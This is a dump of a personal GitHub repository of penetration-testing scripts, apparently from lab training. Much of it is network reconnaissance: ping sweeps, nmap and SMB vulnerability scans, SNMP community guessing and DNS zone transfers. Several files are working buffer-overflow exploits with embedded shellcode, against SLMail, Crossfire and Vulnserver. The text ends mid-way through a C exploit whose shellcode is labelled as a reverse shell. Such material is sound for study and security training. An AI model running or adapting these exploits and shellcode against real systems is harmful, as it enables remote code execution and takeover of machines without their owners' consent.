├── Seba ├── staged_elf ├── non_staged_elf ├── embedded_payload_plink.exe ├── generate_report_nmap.sh ├── test_http_methods.sh ├── crashSlmail.py ├── measure_traffic_nmap_scan.sh ├── crash_crossfre.py ├── zone_transfer.sh ├── windows_machine_discover.sh ├── slmail_fuzzing.py ├── snmp_mib_discover.sh ├── discover-smb-vulnerabilities.sh ├── web_server_scraper_nmap.sh ├── exploit_crossfire.py ├── hex_position_in_buffer.py ├── nmapReport.sh ├── exploitSLmail.py ├── exploitSLmail_improved.py ├── pingSweep.py ├── exploit_vulnserver.py ├── parserHtml.py ├── 643_modified.c ├── 646_modified.c ├── linux_priv_esc_enum.sh └── ms12-037-2.html └── Fons ├── ping_sweep.sh └── ping_sweep.py /Seba/staged_elf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Phat3/Useful-Scripts/HEAD/Seba/staged_elf -------------------------------------------------------------------------------- /Seba/non_staged_elf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Phat3/Useful-Scripts/HEAD/Seba/non_staged_elf -------------------------------------------------------------------------------- /Seba/embedded_payload_plink.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Phat3/Useful-Scripts/HEAD/Seba/embedded_payload_plink.exe -------------------------------------------------------------------------------- /Seba/generate_report_nmap.sh: -------------------------------------------------------------------------------- 1 | echo 'making dir..' 2 | mkdir -p /root/Desktop/lab/$1/report 3 | echo 'do nmap scan...' 4 | nmap -A $1 -o /root/Desktop/lab/$1/report/nmap_general_report 5 | echo 'SUCCESS!' 
6 | -------------------------------------------------------------------------------- /Fons/ping_sweep.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | for i in $(seq 10 11);do 3 | for j in $(seq 1 254); do 4 | ping -c 1 192.168.$i.$j | grep 'bytes from' | grep -Eo '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' & 5 | done 6 | done 7 | 8 | -------------------------------------------------------------------------------- /Seba/test_http_methods.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | for method in GET POST PUT TRACE CONNECT OPTIONS PROPFIND; do 4 | printf "$method " ; 5 | printf "$method / HTTP/1.1\nContent-Length: 7000\nHost: $1\n\n" | nc -q 1 $1 80 | grep "HTTP/1.1" 6 | 7 | done 8 | -------------------------------------------------------------------------------- /Seba/crashSlmail.py: -------------------------------------------------------------------------------- 1 | import socket 2 | 3 | buffer = 'A'*2700 4 | 5 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 6 | print('connecting....') 7 | s.connect(('192.168.31.154', 110)) 8 | s.recv(1024) 9 | s.send('USER test\r\n') 10 | s.recv(1024) 11 | print 'send password...' 12 | s.send('PASS ' + buffer + '\r\n') 13 | s.recv(1024) 14 | print 'CRASH!' 
15 | -------------------------------------------------------------------------------- /Seba/measure_traffic_nmap_scan.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | #reset iptables rules and add our two new rules to measure the output and the input traffic 4 | iptables -I INPUT 1 -s 192.168.31.227 -j ACCEPT 5 | iptables -I OUTPUT 1 -d 192.168.31.227 -j ACCEPT 6 | iptables -Z 7 | #et's do a complete scan with nmap on the monitored host 8 | nmap -A 192.168.31.227 9 | #show results 10 | iptables -vn -L 11 | -------------------------------------------------------------------------------- /Seba/crash_crossfre.py: -------------------------------------------------------------------------------- 1 | import socket 2 | 3 | host = '127.0.0.1' 4 | port = 13327 5 | 6 | payload = "A"*4368 + "B"*4 +"C"*7 7 | 8 | buffer = "\x11(setup sound " + payload + "\x90\x00#" 9 | 10 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 11 | print 'connecting...' 12 | s.connect((host, port)) 13 | print s.recv(1024) 14 | print 'sending buffer...' 15 | s.send(buffer) 16 | print s.recv(1024) 17 | s.close() 18 | print 'CRASH!' 
19 | -------------------------------------------------------------------------------- /Seba/zone_transfer.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | #check if the number of parameters is greater than 0 4 | if [ $# -eq 0 -o $# -gt 1 ]; then 5 | echo 'insert only one parameter (the domain name)' 6 | exit 0 7 | else 8 | #get all name server for the given domain 9 | for ns in $(host -t ns $1 | cut -d " " -f4); do 10 | #try a zone transfer on each name server 11 | host -l $1 $ns | grep "has address"| cut -d " " -f 1,4 12 | done 13 | fi 14 | 15 | 16 | 17 | -------------------------------------------------------------------------------- /Seba/windows_machine_discover.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | rm $HOME/Desktop/fileUtili/windows_machine > /dev/null 4 | 5 | echo 'ping sweep...' 6 | nmap -sn 192.168.31.220-254 -oG out > /dev/null 7 | 8 | for ip in $(cat out | grep Host | cut -d " " -f2); do 9 | echo "analyzing ${ip}..." 10 | if [ ! 
$(nmap -O $ip | grep Windows | wc -l ) -eq 0 ]; then 11 | echo $ip >> $HOME/Desktop/fileUtili/windows_machine; 12 | echo "${ip} added"; 13 | fi 14 | done 15 | rm out 16 | -------------------------------------------------------------------------------- /Seba/slmail_fuzzing.py: -------------------------------------------------------------------------------- 1 | import socket 2 | 3 | buffer = ["A"] 4 | counter = 100 5 | 6 | while len(buffer) <= 30: 7 | buffer.append("A"*counter) 8 | counter = counter + 200 9 | 10 | for string in buffer: 11 | print "Fuzzing PASS with " + str(len(string)) + " bytes" 12 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 13 | connect = s.connect(('192.168.31.154', 110)) 14 | s.recv(1024) 15 | s.send('USER test\r\n') 16 | s.recv(1024) 17 | s.send('PASS ' + string + '\r\n') 18 | s.send('QUIT\r\n') 19 | s.close() 20 | 21 | -------------------------------------------------------------------------------- /Fons/ping_sweep.py: -------------------------------------------------------------------------------- 1 | from netaddr import IPNetwork 2 | import subprocess 3 | import re 4 | 5 | network = '192.168.10.0/23' 6 | processes = [] 7 | for ip in IPNetwork(network): 8 | proc = subprocess.Popen('ping -c 1 '+str(ip)+' &',shell = True ,stdout = subprocess.PIPE) 9 | processes.append(proc) 10 | 11 | for p in processes: 12 | p.wait() 13 | 14 | for proc in processes: 15 | output,error = proc.communicate() 16 | if re.search('bytes from', output): 17 | match = re.search('[0-9]*\.[0-9]*\.[0-9]*\.[0-9]*', output) 18 | print match.group(0) 19 | 20 | 21 | -------------------------------------------------------------------------------- /Seba/snmp_mib_discover.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | rm report > /dev/null 4 | 5 | for ip in $(seq 220 254); do 6 | echo 192.168.31.$ip >> ip_list.tmp 7 | done; 8 | 9 | echo public >> words_list.tmp 10 | echo private >> words_list.tmp 11 | echo 
manager >> words_list.tmp 12 | 13 | onesixtyone -c words_list.tmp -i ip_list.tmp -o report 14 | 15 | rm ip_list.tmp > /dev/null 16 | rm words_list.tmp > /dev/null 17 | 18 | for ip in $(cat report | cut -d " " -f1); do 19 | echo "analyzing ${ip}...." 20 | snmpwalk -c public -v1 $ip >> $ip-report-snmtp 21 | done 22 | 23 | rm report 24 | echo 'SUCCESS!, you will find your reports in the current directory' 25 | -------------------------------------------------------------------------------- /Seba/discover-smb-vulnerabilities.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | rm windows-smb-vuln-report.txt > /dev/null 4 | 5 | 6 | #scan my ip range to find wich machines have te SMB protocol active 7 | nmap -v -p 445,139 192.168.31.220-254 -oG output.tmp 8 | 9 | #for each ip check if smb-os-discovery script return windows as OS 10 | for ip in $(cat output.tmp | grep open | cut -d " " -f 2 ); do 11 | if [ ! $(nmap --script=smb-os-discovery $ip | grep Windows | wc -l ) -eq 0 ]; then 12 | echo "${ip} machine has windows whith SMB protocol" 13 | echo 'checking for vulnerabilities...' 14 | nmap --script=smb-check-vulns.nse --script-args=unsafe=1 $ip >> windows-smb-vuln-report.txt 15 | fi 16 | done 17 | 18 | rm output.tmp 19 | -------------------------------------------------------------------------------- /Seba/web_server_scraper_nmap.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | rm web-server.txt > /dev/null 4 | 5 | echo 'executing ping sweep...' 6 | 7 | nmap -sn 192.168.31.220-254 -oG output.txt > /dev/null 8 | 9 | echo 'done' 10 | echo 'executing web-server port scan...' 
11 | 12 | for ip in $(cat output.txt | grep "Host" | cut -d " " -f2); do 13 | nmap -p 80 $ip -oG web-server.txt > /dev/null 14 | # build a file concatenatng all the results 15 | cat web-server.txt >> web-server-not-formatted.txt 16 | rm web-server.txt 17 | done 18 | 19 | #let's clean the output 20 | cat web-server-not-formatted.txt | grep open | cut -d " " -f2 > web-server.txt 21 | 22 | rm output.txt > /dev/null 23 | rm web-server-not-formatted.txt > /dev/null 24 | 25 | echo 'SUCCESS!, You will find your report in the file callend "web-server.txt" in the current directory' 26 | -------------------------------------------------------------------------------- /Seba/exploit_crossfire.py: -------------------------------------------------------------------------------- 1 | import socket 2 | 3 | host = '127.0.0.1' 4 | port = 13327 5 | 6 | shellcode = ("\xd9\xc9\xd9\x74\x24\xf4\xbe\xc3\x9c\x90\x59\x5f\x2b\xc9" + 7 | "\xb1\x14\x31\x77\x19\x83\xc7\x04\x03\x77\x15\x21\x69\xa1" + 8 | "\x82\x52\x71\x91\x77\xcf\x1c\x14\xf1\x0e\x50\x7e\xcc\x50" + 9 | "\xca\x21\x9c\x38\xef\xdd\x31\xe4\x85\xcd\x60\x44\xd3\x0f" + 10 | "\xe8\x02\xbb\x02\x6d\x43\x7a\x99\xdd\x57\xcd\xc7\xec\xd7" + 11 | "\x6e\xb8\x89\x1a\xf0\x2b\x0c\xce\xce\x13\x62\x8e\x78\xdd" + 12 | "\x84\xe6\x55\x32\x06\x9e\xc1\x63\x8a\x37\x7c\xf5\xa9\x97" + 13 | "\xd3\x8c\xcf\xa7\xdf\x43\x8f") 14 | 15 | payload = shellcode + "\x90"*(4368 - len(shellcode)) + "\x97\x45\x13\x08" + "\x83\xc0\x0c\xff\xe0" + "\x90\x90" 16 | 17 | buffer = "\x11(setup sound " + payload + "\x90\x00#" 18 | 19 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 20 | print 'connecting...' 21 | s.connect((host, port)) 22 | print s.recv(1024) 23 | print 'sending buffer...' 24 | s.send(buffer) 25 | print s.recv(1024) 26 | s.close() 27 | print 'CRASH!' 
28 | 29 | -------------------------------------------------------------------------------- /Seba/hex_position_in_buffer.py: -------------------------------------------------------------------------------- 1 | import subprocess 2 | #old buffer 3 | bufferLength = raw_input('Enter the length of the buffer you want modify: ') 4 | #which pattern i have to find 5 | pattern = raw_input('Enter the hex pattern in reverse order: ') 6 | #create the patthern 7 | p = subprocess.Popen(['/usr/share/metasploit-framework/tools/pattern_create.rb', bufferLength], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) 8 | buffer, err = p.communicate() 9 | #encode in hex the buffer 10 | hexbuffer = buffer.strip().encode('hex') 11 | #find our patter in reverse order (little endian) 12 | position = hexbuffer.find(pattern) 13 | if(position == -1): 14 | print 'Pattern not found' 15 | else: 16 | #get the substring matched and decode it as hex 17 | substrigBuffer = hexbuffer[position : position + 8].decode('hex') 18 | #get the position of the pattern in string format in old buffer 19 | position = buffer.find(substrigBuffer) 20 | #print the formula for the new buffer 21 | print '"A"*' + str(position) + ' + "B"*4 +"C"*' + str((len(buffer.strip()) - 4 - position)) 22 | 23 | -------------------------------------------------------------------------------- /Seba/nmapReport.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | #script that performs a nmap scan only on the up ip addresses on the private network 3 | 4 | #let's do a ping sweep over the entire network range 5 | #array to trace the pids of the ping subprocess 6 | declare -a pidPing=() 7 | declare -a pidNmap=() 8 | 9 | 10 | mkdir $HOME/Desktop/reportNmap; 11 | rm $HOME/Desktop/reportNmap/nmapReport.txt; 12 | 13 | 14 | #let's check our range of ip adresses 15 | for j in $( seq 200 255 ); do 16 | #execute the ping only one time for each ip and get the ip address of the up 
machines 17 | ping -c 1 192.168.31.$j | grep "bytes from" | cut -d " " -f 4 | cut -d ":" -f 1 | sort -u >> $HOME/Desktop/reportNmap/upIPTmp.txt & 18 | echo "ping of 192.168.31.${ip}" 19 | #save the pid of ping 20 | pidPing=(${pidPing[@]} $!) 21 | done 22 | 23 | #wait for all pid in the array 24 | for pidtowait in ${pidPing[@]}; do 25 | wait $pidtowait 26 | echo "pid # ${pidtowait} finished" 27 | done 28 | 29 | #remove duplicates 30 | cat $HOME/Desktop/reportNmap/upIPTmp.txt | sort -u > $HOME/Desktop/reportNmap/upIP.txt 31 | 32 | #let's do an nmap command over the previuous ip list 33 | for ip in $(cat $HOME/Desktop/reportNmap/upIP.txt); do 34 | nmap $ip >> $HOME/Desktop/reportNmap/nmapReport.txt 35 | echo "nmap of ${ip}" 36 | done 37 | 38 | #remove useless file 39 | rm $HOME/Desktop/reportNmap/upIPTmp.txt 40 | rm $HOME/Desktop/reportNmap/upIP.txt 41 | 42 | echo 'SUCCESS!!, you will find your report in $HOME/Desktop/reportNmap/nmapReport.txt' 43 | -------------------------------------------------------------------------------- /Seba/exploitSLmail.py: -------------------------------------------------------------------------------- 1 | import socket 2 | 3 | buf =("\xdd\xc5\xbb\xc8\xcf\x42\xd7\xd9\x74\x24\xf4\x5a\x2b\xc9" + 4 | "\xb1\x4f\x83\xc2\x04\x31\x5a\x15\x03\x5a\x15\x2a\x3a\xbe" + 5 | "\x3f\x23\xc5\x3f\xc0\x53\x4f\xda\xf1\x41\x2b\xae\xa0\x55" + 6 | "\x3f\xe2\x48\x1e\x6d\x17\xda\x52\xba\x18\x6b\xd8\x9c\x17" + 7 | "\x6c\xed\x20\xfb\xae\x6c\xdd\x06\xe3\x4e\xdc\xc8\xf6\x8f" + 8 | "\x19\x34\xf8\xdd\xf2\x32\xab\xf1\x77\x06\x70\xf0\x57\x0c" + 9 | "\xc8\x8a\xd2\xd3\xbd\x20\xdc\x03\x6d\x3f\x96\xbb\x05\x67" + 10 | "\x07\xbd\xca\x74\x7b\xf4\x67\x4e\x0f\x07\xae\x9f\xf0\x39" + 11 | "\x8e\x73\xcf\xf5\x03\x8a\x17\x31\xfc\xf9\x63\x41\x81\xf9" + 12 | "\xb7\x3b\x5d\x8c\x25\x9b\x16\x36\x8e\x1d\xfa\xa0\x45\x11" + 13 | "\xb7\xa7\x02\x36\x46\x64\x39\x42\xc3\x8b\xee\xc2\x97\xaf" + 14 | "\x2a\x8e\x4c\xce\x6b\x6a\x22\xef\x6c\xd2\x9b\x55\xe6\xf1" + 15 | 
"\xc8\xef\xa5\x9d\x3d\xdd\x55\x5e\x2a\x56\x25\x6c\xf5\xcc" + 16 | "\xa1\xdc\x7e\xca\x36\x22\x55\xaa\xa9\xdd\x56\xca\xe0\x19" + 17 | "\x02\x9a\x9a\x88\x2b\x71\x5b\x34\xfe\xd5\x0b\x9a\x51\x95" + 18 | "\xfb\x5a\x02\x7d\x16\x55\x7d\x9d\x19\xbf\x08\x9a\x8e\x80" + 19 | "\xa3\x3a\xd8\x69\xb6\x42\xc0\xfd\x3f\xa4\x66\xee\x69\x7f" + 20 | "\x1f\x97\x33\x0b\xbe\x58\xee\x9b\x23\xca\x75\x5b\x2d\xf7" + 21 | "\x21\x0c\x7a\xc9\x3b\xd8\x96\x70\x92\xfe\x6a\xe4\xdd\xba" + 22 | "\xb0\xd5\xe0\x43\x34\x61\xc7\x53\x80\x6a\x43\x07\x5c\x3d" + 23 | "\x1d\xf1\x1a\x97\xef\xab\xf4\x44\xa6\x3b\x80\xa6\x79\x3d" + 24 | "\x8d\xe2\x0f\xa1\x3c\x5b\x56\xde\xf1\x0b\x5e\xa7\xef\xab" + 25 | "\xa1\x72\xb4\xdc\xeb\xde\x9d\x74\xb2\x8b\x9f\x18\x45\x66" + 26 | "\xe3\x24\xc6\x82\x9c\xd2\xd6\xe7\x99\x9f\x50\x14\xd0\xb0" + 27 | "\x34\x1a\x47\xb0\x1c") 28 | 29 | buffer = 'A'*2606 + "\x8f\x35\x4a\x5f" + "\x90"*8 + buf 30 | 31 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 32 | print('connecting....') 33 | s.connect(('192.168.31.154', 110)) 34 | s.recv(1024) 35 | s.send('USER test\r\n') 36 | s.recv(1024) 37 | print 'send password...' 38 | s.send('PASS ' + buffer + '\r\n') 39 | s.recv(1024) 40 | print 'SUCCESS!' 
41 | -------------------------------------------------------------------------------- /Seba/exploitSLmail_improved.py: -------------------------------------------------------------------------------- 1 | import socket 2 | 3 | buf =("\xb8\xe6\x01\x8e\xd3\xda\xce\xd9\x74\x24\xf4\x5a\x29\xc9" + 4 | "\xb1\x4f\x31\x42\x14\x03\x42\x14\x83\xc2\x04\x04\xf4\x72" + 5 | "\x3b\x41\xf7\x8a\xbc\x31\x71\x6f\x8d\x63\xe5\xfb\xbc\xb3" + 6 | "\x6d\xa9\x4c\x38\x23\x5a\xc6\x4c\xec\x6d\x6f\xfa\xca\x40" + 7 | "\x70\xcb\xd2\x0f\xb2\x4a\xaf\x4d\xe7\xac\x8e\x9d\xfa\xad" + 8 | "\xd7\xc0\xf5\xff\x80\x8f\xa4\xef\xa5\xd2\x74\x0e\x6a\x59" + 9 | "\xc4\x68\x0f\x9e\xb1\xc2\x0e\xcf\x6a\x59\x58\xf7\x01\x05" + 10 | "\x79\x06\xc5\x56\x45\x41\x62\xac\x3d\x50\xa2\xfd\xbe\x62" + 11 | "\x8a\x51\x81\x4a\x07\xa8\xc5\x6d\xf8\xdf\x3d\x8e\x85\xe7" + 12 | "\x85\xec\x51\x62\x18\x56\x11\xd4\xf8\x66\xf6\x82\x8b\x65" + 13 | "\xb3\xc1\xd4\x69\x42\x06\x6f\x95\xcf\xa9\xa0\x1f\x8b\x8d" + 14 | "\x64\x7b\x4f\xac\x3d\x21\x3e\xd1\x5e\x8d\x9f\x77\x14\x3c" + 15 | "\xcb\x01\x77\x29\x38\x3f\x88\xa9\x56\x48\xfb\x9b\xf9\xe2" + 16 | "\x93\x97\x72\x2c\x63\xd7\xa8\x88\xfb\x26\x53\xe8\xd2\xec" + 17 | "\x07\xb8\x4c\xc4\x27\x53\x8d\xe9\xfd\xf3\xdd\x45\xae\xb3" + 18 | "\x8d\x25\x1e\x5b\xc4\xa9\x41\x7b\xe7\x63\xf4\xbc\x70\x4c" + 19 | "\xaf\x5c\x16\x24\xb2\x60\x3e\x21\x3b\x86\x54\x59\x6a\x11" + 20 | "\xc1\xc0\x37\xe9\x70\x0c\xe2\x79\x10\x9f\x69\x79\x5f\xbc" + 21 | "\x25\x2e\x08\x72\x3c\xba\xa4\x2d\x96\xd8\x34\xab\xd1\x58" + 22 | "\xe3\x08\xdf\x61\x66\x34\xfb\x71\xbe\xb5\x47\x25\x6e\xe0" + 23 | "\x11\x93\xc8\x5a\xd0\x4d\x83\x31\xba\x19\x52\x7a\x7d\x5f" + 24 | "\x5b\x57\x0b\xbf\xea\x0e\x4a\xc0\xc3\xc6\x5a\xb9\x39\x77" + 25 | "\xa4\x10\xfa\x97\x47\xb0\xf7\x3f\xde\x51\xba\x5d\xe1\x8c" + 26 | "\xf9\x5b\x62\x24\x82\x9f\x7a\x4d\x87\xe4\x3c\xbe\xf5\x75" + 27 | "\xa9\xc0\xaa\x76\xf8") 28 | 29 | buffer = 'A'*2606 + "\x8f\x35\x4a\x5f" + "\x90"*8 + buf 30 | 31 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 32 | print('connecting....') 33 | 
s.connect(('192.168.31.154', 110)) 34 | s.recv(1024) 35 | s.send('USER test\r\n') 36 | s.recv(1024) 37 | print 'send password...' 38 | s.send('PASS ' + buffer + '\r\n') 39 | s.recv(1024) 40 | s.close() 41 | print 'SUCCESS!' 42 | -------------------------------------------------------------------------------- /Seba/pingSweep.py: -------------------------------------------------------------------------------- 1 | import subprocess, os 2 | #TODO da renderlo flessibile dal punto di vista della netmask(capire la lungezza della netmask e pingare tutti gli indrizzi posibili con quella netmask) 3 | subnetMask = '255.255.254.0.0' 4 | #TODO rendere possibile inserimento start e end da parte dell utente e fare in modo che funzioni con altre netmasck diverse dalla 24 5 | startAddress = '192.168.31.200' 6 | endAddress = '192.168.31.254' 7 | 8 | ''' 9 | da implementare la flessibilita della netmask (ora non c e tempo) 10 | conversion = '' 11 | for part in subnetMask.split('.'): 12 | binary = bin(int(part)).split("0b") 13 | conversion = conversion + binary[1] 14 | print conversion.count("1") 15 | ''' 16 | #prendiamo l'ultima parte degli indirizzi 17 | start = int(startAddress.split(".")[3]) 18 | end = int(endAddress.split(".")[3]) 19 | #inizializziamo l array dei network che rispondono al ping 20 | responseNetwork = [] 21 | count = 0 22 | 23 | #scorriamo tutti gli indirizzi nel range e pinghiamo la macchina 24 | for x in xrange(start,end): 25 | address = '192.168.31.' 
+ str(x) 26 | process = subprocess.Popen('ping -c 1 ' + address, shell = True, stdout=subprocess.PIPE) 27 | out, err = process.communicate() 28 | count = count +1 29 | print 'Controllati ' + str(count) + ' Indirizzi' 30 | #se non ho questa frase (il count e > 0) allora la macchina ha risposto 31 | if (out.count("Destination Host Unreachable") == 0): 32 | print 'Indirizzo aggiunto' 33 | responseNetwork.append(address) 34 | 35 | #ricaviamo la directory dove vogliamo salvare i file partendo dalla home dell utente 36 | directory = os.path.expanduser('~') + '/Desktop/fileUtili' 37 | #se non esiste la directory creiamola e apriamo il file 38 | if (os.path.isdir(directory)): 39 | fileOutput = open(directory + '/indirizziAttivi.txt', 'w') 40 | else: 41 | os.makedirs(directory) 42 | fileOutput = open(directory + '/indirizziAttivi.txt', 'w') 43 | #scriviamo il file 44 | for addr in responseNetwork: 45 | fileOutput.write(addr + "\n") 46 | 47 | print 'SUCCESS!' 48 | -------------------------------------------------------------------------------- /Seba/exploit_vulnserver.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import time, struct 3 | import socket as so 4 | 5 | server = '192.168.31.154' 6 | port = 5555 7 | 8 | buf =("\xba\x31\x9f\xfd\xec\xdd\xc2\xd9\x74\x24\xf4\x5f\x33\xc9" + 9 | "\xb1\x4f\x83\xc7\x04\x31\x57\x10\x03\x57\x10\xd3\x6a\x01" + 10 | "\x04\x9a\x95\xfa\xd5\xfc\x1c\x1f\xe4\x2e\x7a\x6b\x55\xfe" + 11 | "\x08\x39\x56\x75\x5c\xaa\xed\xfb\x49\xdd\x46\xb1\xaf\xd0" + 12 | "\x57\x74\x70\xbe\x94\x17\x0c\xbd\xc8\xf7\x2d\x0e\x1d\xf6" + 13 | "\x6a\x73\xee\xaa\x23\xff\x5d\x5a\x47\xbd\x5d\x5b\x87\xc9" + 14 | "\xde\x23\xa2\x0e\xaa\x99\xad\x5e\x03\x96\xe6\x46\x2f\xf0" + 15 | "\xd6\x77\xfc\xe3\x2b\x31\x89\xd7\xd8\xc0\x5b\x26\x20\xf3" + 16 | "\xa3\xe4\x1f\x3b\x2e\xf5\x58\xfc\xd1\x80\x92\xfe\x6c\x92" + 17 | "\x60\x7c\xab\x17\x75\x26\x38\x8f\x5d\xd6\xed\x49\x15\xd4" + 18 | 
"\x5a\x1e\x71\xf9\x5d\xf3\x09\x05\xd5\xf2\xdd\x8f\xad\xd0" + 19 | "\xf9\xd4\x76\x79\x5b\xb1\xd9\x86\xbb\x1d\x85\x22\xb7\x8c" + 20 | "\xd2\x54\x9a\xd8\x17\x6a\x25\x19\x30\xfd\x56\x2b\x9f\x55" + 21 | "\xf1\x07\x68\x73\x06\x67\x43\xc3\x98\x96\x6c\x33\xb0\x5c" + 22 | "\x38\x63\xaa\x75\x41\xe8\x2a\x79\x94\xbe\x7a\xd5\x47\x7e" + 23 | "\x2b\x95\x37\x16\x21\x1a\x67\x06\x4a\xf0\x1e\x01\xdd\x3b" + 24 | "\x88\x93\x89\xd4\xcb\xab\x93\xb0\x45\x4d\xb1\xa8\x03\xc6" + 25 | "\x2e\x50\x0e\x9c\xcf\x9d\x84\x34\x73\x0f\x43\xc4\xfa\x2c" + 26 | "\xdc\x93\xab\x83\x15\x71\x46\xbd\x8f\x67\x9b\x5b\xf7\x23" + 27 | "\x40\x98\xf6\xaa\x05\xa4\xdc\xbc\xd3\x25\x59\xe8\x8b\x73" + 28 | "\x37\x46\x6a\x2a\xf9\x30\x24\x81\x53\xd4\xb1\xe9\x63\xa2" + 29 | "\xbd\x27\x12\x4a\x0f\x9e\x63\x75\xa0\x76\x64\x0e\xdc\xe6" + 30 | "\x8b\xc5\x64\x06\x6e\xcf\x90\xaf\x37\x9a\x18\xb2\xc7\x71" + 31 | "\x5e\xcb\x4b\x73\x1f\x28\x53\xf6\x1a\x74\xd3\xeb\x56\xe5" + 32 | "\xb6\x0b\xc4\x06\x93") 33 | 34 | #find JMP ESP operation at 65D11D71 35 | req1 = "AUTH " +"A"*1040 + "\x71\x1d\xd1\x65" + "\x90"*16 + buf 36 | s = so.socket(so.AF_INET, so.SOCK_STREAM) 37 | try: 38 | s.connect((server, port)) 39 | print repr(s.recv(1024)) 40 | s.send(req1) 41 | print repr(s.recv(1024)) 42 | except: 43 | print "[!] 
connection refused, check debugger" 44 | s.close() 45 | -------------------------------------------------------------------------------- /Seba/parserHtml.py: -------------------------------------------------------------------------------- 1 | import urllib2, sys, getopt, re 2 | from subprocess import call 3 | 4 | def main(argv): 5 | #variabili per tenere traccia delle opzioni inserite 6 | #dominio su cui effettuare la ricerca 7 | url = '' 8 | #parolachiave su cui cosruire la regex 9 | key = '' 10 | #ricaviamo le opzioni inserite 11 | try: 12 | opts, argrs = getopt.getopt(argv, 'hu:k:', '[help, url, key]') 13 | #se non metto tutte le opzioni visualizza l'helper(non funzionante) 14 | except getopt.GetoptError: 15 | print 'usage : parserHtml.py -u -k ' 16 | sys.exit(2) 17 | for opt, arg in opts: 18 | if opt in ('-h', '--help'): 19 | print 'usage : parserHtml.py -u -k ' 20 | sys.exit() 21 | elif opt in ('-u', '--url'): 22 | url = arg 23 | elif opt in ('-k', '--key'): 24 | key = arg 25 | #scarichiamo la pagina da analizzare 26 | response = urllib2.urlopen('http://' + url) 27 | html = response.read() 28 | #ricaviamo i link all interno della pagina 29 | regexp = buildRegex(key) 30 | links = regexp.finditer(html) 31 | #costruiamo la lista giusta senza doppioni 32 | linkWithoutDuplicates = buildLinkList(links) 33 | doHostCommand(linkWithoutDuplicates) 34 | 35 | 36 | #Funzione che restitutisce la regexp corretta ricavandola dalla key immessa 37 | def buildRegex(key): 38 | #inizimo dalla regex di base 39 | regex = "http://[^\"]*.*" 40 | #splittiamo sul punto cosi da poter fare l escape con il \ (nelle regex il . 
equivale al match di qualsiasi carattere se non ha lescape) 41 | parts = key.split(".") 42 | #per ogni segmento 43 | for index, value in enumerate(parts): 44 | #se e l ultimo non mettto il punto con escape 45 | if index == (len(parts) - 1): 46 | regex = regex + value 47 | #a tutti gli altri segmenti ncodo il punto con escape 48 | else: 49 | regex = regex + value + "\." 50 | #aggiungiamo la parte finale 51 | regex = regex + ".*" 52 | return re.compile(r'' + regex) 53 | 54 | def buildLinkList(links): 55 | #iniziamo a costruire la lista 56 | linkList = [] 57 | #ricaviamo la parte di link interessante depurando lla stringa da parti non volute 58 | for link in links: 59 | linkPart = link.group().split("/") 60 | #ci interessano solo i sottodomini in questo caso 61 | linkCorrect = linkPart[2] 62 | linkList.append(linkCorrect) 63 | #togliamo i doppioni dalla lista 64 | linkWithoutDuplicates = set(linkList) 65 | #stampiamo la lista definitiva 66 | return linkWithoutDuplicates 67 | 68 | def doHostCommand(linkList): 69 | for link in linkList: 70 | command = 'host ' + link 71 | a = call(command, shell=True) 72 | 73 | 74 | if __name__ == "__main__": 75 | main(sys.argv[1:]) 76 | -------------------------------------------------------------------------------- /Seba/643_modified.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | 12 | #define RETADD "\x8f\x35\x4a\x5f" 13 | #define PORT 110 14 | 15 | /* revshell ?????? ???????? 
????????*/ 16 | char shellcode[] = 17 | "\xb8\xe6\x01\x8e\xd3\xda\xce\xd9\x74\x24\xf4\x5a\x29\xc9" 18 | "\xb1\x4f\x31\x42\x14\x03\x42\x14\x83\xc2\x04\x04\xf4\x72" 19 | "\x3b\x41\xf7\x8a\xbc\x31\x71\x6f\x8d\x63\xe5\xfb\xbc\xb3" 20 | "\x6d\xa9\x4c\x38\x23\x5a\xc6\x4c\xec\x6d\x6f\xfa\xca\x40" 21 | "\x70\xcb\xd2\x0f\xb2\x4a\xaf\x4d\xe7\xac\x8e\x9d\xfa\xad" 22 | "\xd7\xc0\xf5\xff\x80\x8f\xa4\xef\xa5\xd2\x74\x0e\x6a\x59" 23 | "\xc4\x68\x0f\x9e\xb1\xc2\x0e\xcf\x6a\x59\x58\xf7\x01\x05" 24 | "\x79\x06\xc5\x56\x45\x41\x62\xac\x3d\x50\xa2\xfd\xbe\x62" 25 | "\x8a\x51\x81\x4a\x07\xa8\xc5\x6d\xf8\xdf\x3d\x8e\x85\xe7" 26 | "\x85\xec\x51\x62\x18\x56\x11\xd4\xf8\x66\xf6\x82\x8b\x65" 27 | "\xb3\xc1\xd4\x69\x42\x06\x6f\x95\xcf\xa9\xa0\x1f\x8b\x8d" 28 | "\x64\x7b\x4f\xac\x3d\x21\x3e\xd1\x5e\x8d\x9f\x77\x14\x3c" 29 | "\xcb\x01\x77\x29\x38\x3f\x88\xa9\x56\x48\xfb\x9b\xf9\xe2" 30 | "\x93\x97\x72\x2c\x63\xd7\xa8\x88\xfb\x26\x53\xe8\xd2\xec" 31 | "\x07\xb8\x4c\xc4\x27\x53\x8d\xe9\xfd\xf3\xdd\x45\xae\xb3" 32 | 